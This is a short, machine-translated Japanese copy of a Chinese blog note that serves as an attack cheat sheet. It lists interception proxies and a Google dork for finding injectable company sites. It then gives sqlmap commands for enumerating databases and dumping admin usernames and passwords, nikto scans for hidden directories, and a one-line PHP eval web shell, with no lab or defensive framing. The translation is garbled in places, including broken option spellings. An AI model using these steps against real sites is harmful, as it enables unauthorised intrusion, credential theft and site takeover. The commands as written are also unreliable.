sqlmap の使用法とレコードの爆発

#プロキシ インターセプト ツール
mitmproxy -p 8800 #プロキシの構成

owasp-zap (攻撃プロキシ ZAP) は、
Web アプリケーションの脆弱性を発見するための包括的なペネトレーション テスト ツール パッケージであり、傍受プロキシ、自動プロキシ、パッシブ処理、ブルート フォース クラッキング、ポート スキャン、スパイダー検索機能が含まれています。

Burp Suite は、Web アプリケーションを攻撃するための統合プラットフォームです。
プロキシ Burp Suite には、デフォルトのポート 8080 で実行されるプロキシが付属しています。このプロキシを使用します。

proxyStrike v2.1 プロキシ ツール

webscarab エージェント ソフトウェアには、http プロキシ、Web クローラー、Web スパイダー、セッション ID 分析、自動スクリプト インターフェイス、ファズ テスト ツール、
Web フォーマットのエンコード/デコード、WEB サービス記述言語、SOAP パーサーおよびその他の機能モジュールが含まれます。webScarab は GNU プロトコルに基づいており、JAVA で書かれており、WEBGoat で使用されるツールの 1 つです。

Google ハックを通じてテスト ターゲットを見つけます:
検索 -> 会社 inurl:asp?id=

1. デジタル インジェクション ポイントをテストします。
2. SQLmap を使用してデータベースとテーブル名を逆アセンブルします。
3. テーブル データをダンプします
。 4. バックグラウンドでログインします。

'
データベースのバージョン、現在のユーザー、現在のデータベースを読み取ります
sqlmap -u URL -f -b -current-dbs -curent-user -v 1

sqlmap -u URL --tables #攻撃される可能性のあるテーブルをリストする

sqlmap -u URL -T uname --columns #有用な列をリストする

sqlmap -u URL -T uname - C ログイン名、パス、ユーザー名 --dump #-C は検索する列を指定します。 --dump 

PHP サイトの SQL インジェクション:
1. 数値インジェクション ポイントをテストします。
2. Sqlmap はデータベースとテーブル名を分解します。
3. テーブル データをダンプします。
4. nikto を使用して隠しディレクトリを見つけ
ます。 5. Web ページ コード内の隠し情報を使用して、管理バックエンド

sqlmap -u url --dbs --current-user    

sqlmap -u URL --dbs --dbms mysql -D cmxt --tables #cmxt はデータベースです

sqlmap -u URL --dbs --dbms mysql --tables #データベースを指定しないでください


sqlmap -u URL --dbs --dbms mysql -T admin -columns #列の結果を表示

sqlmap -u URL --dbs --dbms mysql -T admin -C user,pwd --dump #特定の列の値をクエリする

nikto -host プライマリ ドメイン名 # Web サイトの対応するディレクトリをチェックして、既存の脆弱性を確認します。

fiddler :autoresponser は、対応する Web ページを返します。権威を高めるため。

<?php eval($_POST[x]);?> 一文のパスワード

おすすめ

転載: blog.csdn.net/davice_li/article/details/131792290